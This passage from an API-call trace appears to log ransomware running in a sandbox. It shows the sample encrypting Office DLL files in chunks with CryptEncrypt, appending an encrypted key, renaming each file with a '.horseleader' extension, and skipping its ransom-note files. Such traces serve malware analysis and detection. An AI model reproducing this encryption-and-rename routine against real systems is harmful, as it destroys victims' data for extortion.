lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.143] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.851] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa3da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.851] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.854] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.854] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.854] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.859] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.859] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.859] CloseHandle (hObject=0x158) returned 1 [0243.859] GetProcessHeap () returned 0x780000 [0243.859] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.860] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.horseleader") returned 82 [0243.860] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.horseleader")) returned 1 [0243.861] GetProcessHeap () returned 0x780000 [0243.861] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.861] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd82940c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x48990, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACETXT.DLL", cAlternateFileName="")) returned 1 [0243.861] lstrcmpiW (lpString1="ACETXT.DLL", lpString2="Windows") returned -1 [0243.861] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 70 [0243.861] StrStrIW (lpFirst="ACETXT.DLL", lpSrch=".horseleader") returned 0x0 [0243.861] 
lstrcmpW (lpString1="ACETXT.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.861] lstrcmpW (lpString1="ACETXT.DLL", lpString2="_uninstalling_.png") returned 1 [0243.861] lstrlenW (lpString=".testttjffg") returned 11 [0243.861] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL", lpSrch=".testttjffg") returned 0x0 [0243.861] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.861] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.862] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 70 [0243.862] StrStrW (lpFirst="ACETXT.DLL", lpSrch=".txt") returned 0x0 [0243.862] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=297360) returned 1 [0243.862] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.862] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.865] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.865] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x21cc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.865] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.867] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.867] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.868] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x43990, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.868] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.870] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.870] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.871] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.871] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, 
lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.871] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.871] CloseHandle (hObject=0x158) returned 1 [0243.871] GetProcessHeap () returned 0x780000 [0243.871] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.872] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.horseleader") returned 82 [0243.872] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.horseleader")) returned 1 [0243.873] GetProcessHeap () returned 0x780000 [0243.873] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.873] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1092c00, ftCreationTime.dwHighDateTime=0x1cb71c7, ftLastAccessTime.dwLowDateTime=0xd82ba220, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x1092c00, ftLastWriteTime.dwHighDateTime=0x1cb71c7, nFileSizeHigh=0x0, nFileSizeLow=0x2e8da0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEWDAT.DLL", cAlternateFileName="")) returned 1 [0243.873] lstrcmpiW (lpString1="ACEWDAT.DLL", lpString2="Windows") returned -1 [0243.873] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 71 [0243.873] StrStrIW (lpFirst="ACEWDAT.DLL", lpSrch=".horseleader") returned 0x0 [0243.873] lstrcmpW (lpString1="ACEWDAT.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.873] lstrcmpW (lpString1="ACEWDAT.DLL", lpString2="_uninstalling_.png") returned 1 [0243.873] lstrlenW (lpString=".testttjffg") returned 11 [0243.873] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL", lpSrch=".testttjffg") returned 0x0 [0243.873] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.873] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.873] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.874] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 71 [0243.874] StrStrW (lpFirst="ACEWDAT.DLL", lpSrch=".txt") returned 0x0 [0243.874] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3050912) returned 1 [0243.874] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.874] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.877] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.877] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.877] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x171ed0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.877] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.883] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.883] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.883] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2e3da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.883] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.888] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.888] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.889] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.889] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.889] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.889] CloseHandle (hObject=0x158) returned 1 [0243.893] GetProcessHeap () returned 0x780000 [0243.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.893] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.horseleader") returned 83 [0243.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.horseleader")) returned 1 [0243.894] GetProcessHeap () returned 0x780000 [0243.894] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.894] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e0c9f00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xcf0c7d40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8e0c9f00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x4dba0, dwReserved0=0xfb834915, 
dwReserved1=0xd3dda4fd, cFileName="ACEWSS.DLL", cAlternateFileName="")) returned 1 [0243.895] lstrcmpiW (lpString1="ACEWSS.DLL", lpString2="Windows") returned -1 [0243.895] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 70 [0243.895] StrStrIW (lpFirst="ACEWSS.DLL", lpSrch=".horseleader") returned 0x0 [0243.895] lstrcmpW (lpString1="ACEWSS.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.895] lstrcmpW (lpString1="ACEWSS.DLL", lpString2="_uninstalling_.png") returned 1 [0243.895] lstrlenW (lpString=".testttjffg") returned 11 [0243.895] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL", lpSrch=".testttjffg") returned 0x0 [0243.895] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.895] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.895] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.897] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL") returned 70 [0243.897] StrStrW (lpFirst="ACEWSS.DLL", lpSrch=".txt") returned 0x0 [0243.897] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=318368) returned 1 [0243.897] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.897] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.916] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.916] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.917] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x245d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.917] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.919] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.919] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.919] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x48ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.919] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.922] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.922] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.922] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.922] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.922] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.922] CloseHandle (hObject=0x158) returned 1 [0243.923] GetProcessHeap () returned 0x780000 [0243.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.923] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.horseleader") returned 82 [0243.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWSS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewss.dll.horseleader")) returned 1 [0243.925] GetProcessHeap () returned 0x780000 [0243.925] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.925] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, 
ftLastAccessTime.dwLowDateTime=0xd82e0380, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x7a998, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEXBE.DLL", cAlternateFileName="")) returned 1 [0243.925] lstrcmpiW (lpString1="ACEXBE.DLL", lpString2="Windows") returned -1 [0243.925] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 70 [0243.925] StrStrIW (lpFirst="ACEXBE.DLL", lpSrch=".horseleader") returned 0x0 [0243.925] lstrcmpW (lpString1="ACEXBE.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.925] lstrcmpW (lpString1="ACEXBE.DLL", lpString2="_uninstalling_.png") returned 1 [0243.925] lstrlenW (lpString=".testttjffg") returned 11 [0243.925] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL", lpSrch=".testttjffg") returned 0x0 [0243.925] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.925] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.926] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acexbe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.927] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEXBE.DLL") returned 70 [0243.927] StrStrW (lpFirst="ACEXBE.DLL", lpSrch=".txt") returned 0x0 [0243.927] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: 
lpFileSize=0x32aedd0*=502168) returned 1 [0243.927] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.927] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.930] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.930] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 